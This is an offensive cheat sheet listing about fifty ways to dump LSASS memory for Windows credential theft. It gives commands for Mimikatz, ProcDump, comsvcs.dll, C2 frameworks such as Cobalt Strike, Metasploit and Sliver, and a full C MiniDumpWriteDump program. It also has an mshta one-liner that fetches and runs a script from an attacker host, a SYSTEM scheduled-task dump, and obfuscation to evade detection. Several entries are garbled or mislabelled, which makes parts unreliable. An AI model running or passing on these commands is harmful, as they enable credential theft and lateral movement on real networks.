50 Methods For Lsass Dump

50 Methods For Lsass Dump

Mimikatz

Methods: Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync

ProcDump

Methods: procdump -ma lsass.exe lsass.dmp procdump -accepteula -64 -ma lsass.exe lsass.dmp

Process Hacker

Methods: System->LSASS process->Create Dump

DumpIt

Methods: tasklist /FI "IMAGENAME eq lsass.exe" DumpIt.exe PID output_file_name.bin

Windows Debugging Tools

Methods: windbg -p .dump /ma c:\path\to\lsass.dmp .detach .q

FTK Imager

Methods: Create Disk Image Physical Drive Capture Memory LSASS.exe

Volatility

Methods: Pstree volatility -f memory_dump.raw --profile=Win7SP1x64 memdump -p <lsass_pid> -D <output_directory>

WinPmem

Methods: winpmem.exe -o dump.raw

hiberfil.sys

Methods: windbg.exe -y srvc:\symbolsmsdl.microsoft.com/download/symbols -i c:\symbols -z C:\hiberfil.sys Yes !process 0 0 lsass.exe !process 0 0 lsass.exe; .dump /ma

Windows Error Reporting

Methods: HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps->DumpType->2 Lsass-Shtinkering.exe

LiveKd

Methods: LiveKd.exe -w !process 0 0 lsass.exe .process /p [lsass PID] .dump /ma [dump file path]

Task Manager

Methods: Powershell -ep bypass Get-Process lsass C:\Windows\System32\Taskmgr.exe /dumpfile=C:\lsass.dmp /pid=<LSASS_PID>

Cobalt Strike+SharpDump

Methods: Execute-assembly SharpDump Or load sharpdump

sharpdump

Cobalt Strike+mimikatz_command

Methods: Mimikatz_command sekurlsa::minidump

Cobalt Strike+taskkill

Methods: taskkill /f /im lsass.exe

Cobalt Strike+Sysinternals

Methods: load sysinternals Procexp "File" -> "Save"

Cobalt Strike+schtasks Methods: cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC Weekly /D SAT /TN Commands /TR "''rundll32.exe'' C:\windows\system32\comsvcs.dll MiniDump "+strPID+" C:\Windows\Tasks\dump.bin full" /ST 06:06:06 && Schtasks.exe /run /TN Commands && REM ' -Force;"

Brute Ratel C4+Kiwi

Methods: load kiwi Lsa_dump_sam lsa_dump_secrets

Metasploit+lsassy

Methods: use post/windows/gather/credentials/lsassy set SESSION Run or exploit

Covenant+SharpKatz

Methods: Create Task->Module->SharpKatz Arguments->lsa_dump

Empire+wmiexec

Methods: Modules credentials/mimikatz/lsass_dump Execute or run sekurlsa::minidump

Sliver+lsass_dump

Methods: use lsass_dump Options run

Villain

Methods: villain.exe agent villain.exe client -c <IP_ADDRESS> villain.exe dump lsass

Octopus

Methods: pupy.exe shell --cmd "python -m pupy.modules.pupywinutils.lsassdump -o C:\temp\lsass.dmp"

NimPlant

Methods: lsassdump

PoshC2+MiniDumpWriteDump

Methods: MiniDumpWriteDump Get-LsassDumpProcDump

PoshC2+NtQueryVirtualMemory

Methods: NtQueryVirtualMemory Get-LsassDumpNtQueryVirtualMemory

PoshC2+BloodHound

Methods: Get-LsassDumpBloodHound

Manjusaka

Methods: mshta.exe javascript:A=new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:/r.ps1')",0);close(); Manjusaka lsass dump

Dumpert

Methods: Dumpert.exe -k lsass.exe -s -o lsass.dmp

NanoDump

Methods: NanoDump.exe -t [process ID] -o [output file path]

Spraykatz

Methods: spraykatz.exe -w -u -p --krb5i --mimikatz "sekurlsa::minidump lsass.dmp" "exit"

HandleKatz

Methods: HandleKatz.exe -p lsass.exe HandleKatz.exe -p lsass.exe -o [handle ID] -dump

CallBackDump

Methods: CallbackDump.exe -d <dump_file_path> -p <process_id>

LsassSilentProcessExit

Methods: LsassSilentProcessExit.exe

AndrewSpecial

Methods: AndrewSpecial andrew.dmp!

Masky

Methods: .\Masky.exe /ca:'CA SERVER\CA NAME' (/template:User) (/currentUser) (/output:./output.txt) (/debug:./debug.txt)

SharpMiniDump

Methods: SharpMiniDump.exe -p <lsass_process_id> -o lsass.dmp

MiniDump

Methods: MiniDump.exe /p <process_id> /o <output_file_name>

LsassDumpReflectiveDll

Methods: Import-Module .\ReflectiveLsassDump.dll Invoke-ReflectivePEInjection -PEBytes (Get-Content ReflectiveLsassDump.dll -Encoding Byte) -ProcessID (Get-Process lsass).Id

MoonSols Windows Memory Toolkit

Methods: MoonSolsWindowsMemoryToolkit.exe Dumping->Launch DumpIt LSASS->Select the process to dump

MiniDumpWriteDump

Methods: OpenProcess MiniDumpWriteDump

#include <windows.h>
#include <dbghelp.h>

int main()
{
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, <lsass_process_id>);
    if (hProcess == NULL)
    {
        printf("Failed to open process: %u\n", GetLastError());
        return 1;
    }

    WCHAR dumpFileName[MAX_PATH];
    swprintf(dumpFileName, MAX_PATH, L"lsass.dmp");

    HANDLE hDumpFile = CreateFile(dumpFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDumpFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed to create dump file: %u\n", GetLastError());
        CloseHandle(hProcess);
        return 1;
    }

    BOOL success = MiniDumpWriteDump(hProcess, <lsass_process_id>, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
    if (!success)
    {
        printf("Failed to create minidump: %u\n", GetLastError());
        CloseHandle(hDumpFile);
        CloseHandle(hProcess);
        return 1;
    }

    CloseHandle(hDumpFile);
    CloseHandle(hProcess);

    return 0;
}

Comsvcs.dll

Methods: regsvr32 comsvcs.dll rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump lsass.exe lsass.dmp full

MirrorDump

Methods: .\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824

Dumpy

Methods: dumpy.exe dump -k secretKey -u remotehost/upload force

RToolZ+ProcExp152.sys

Methods: .\procexp64.exe -accepteula /t RToolZ -p

SharpUnhooker+LsassUnhooker

Methods: LsassUnhooker.exe -r <output_file_path> SharpUnhooker.exe inject --process lsass.exe --modulepath ReflectiveDLL.dll SharpUnhooker.exe dump --process lsass.exe --output lsass_dump.bin

hashdump

Methods: Kldumper.exe laZagne_x64.exe PwDump7.exe QuarksPwDump.exe SqlDumper.exe Wce_x64.exe SAMInside.exe

Mimikatz+Invoke-Obfuscation

Methods: Invoke-Obfuscation -ScriptBlock { [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('C:\mimikatz.exe')) } -Command 'Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("JABzAD0ATwB2AGkAZQBzAC4AQwBvAG0AbQBhAG4AQQB0AHIAZQBzAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAHIAZQBzAG8AXQAuAFQAcgBpAGMAeQBTAHQAcgBlAGEAbQAuAEEAcABwAG8AcgB0AGwAZQBOAGEAbQBlAFMAdABpAG4AZwBdACkAIAB8ACAACgAkAHMAdwB3AG8AcgBkACAAPQAgAFsAcwBdAC4AVwBpAG4AZABvAHcAbgBhAGwAaQB6AGUAXQAoAFsAUwB5AHMAdABlAG0ALgBJAG4AdgBpAGQAZQBJAHQAKAAiAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbQBwAHIAZQBzAGgAZQBuAGQAKQBdAC4AQQBzAHMAZQBtAGIAbABlAC4AVABvAHAAYwBvAG4AcwB0AHIAYQB0AGUAZAAoACcAKwAnACsAJwApAC4AUABhAGMAZQBuAHQAYQB0AGUAUwB0AGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB2AGkAZABlAEkAdAAoACcARQB4AGkAbgBzAGMAcgBpAHAAbwB3AGUAcgBzAGgAZQBuAGMAaABpAG8AbgBzAHQAcgBpAG4AZwAnACkAKQBdACkA")]))'

Import-Module PowerSploit Invoke-Mimikatz -DumpCreds

BetterSafetyKatz

Methods: .\BetterSafetyKatz.exe .\BetterSafetyKatz.exe '.\mimikatz_trunk.zip'
Sekurlsa::minidump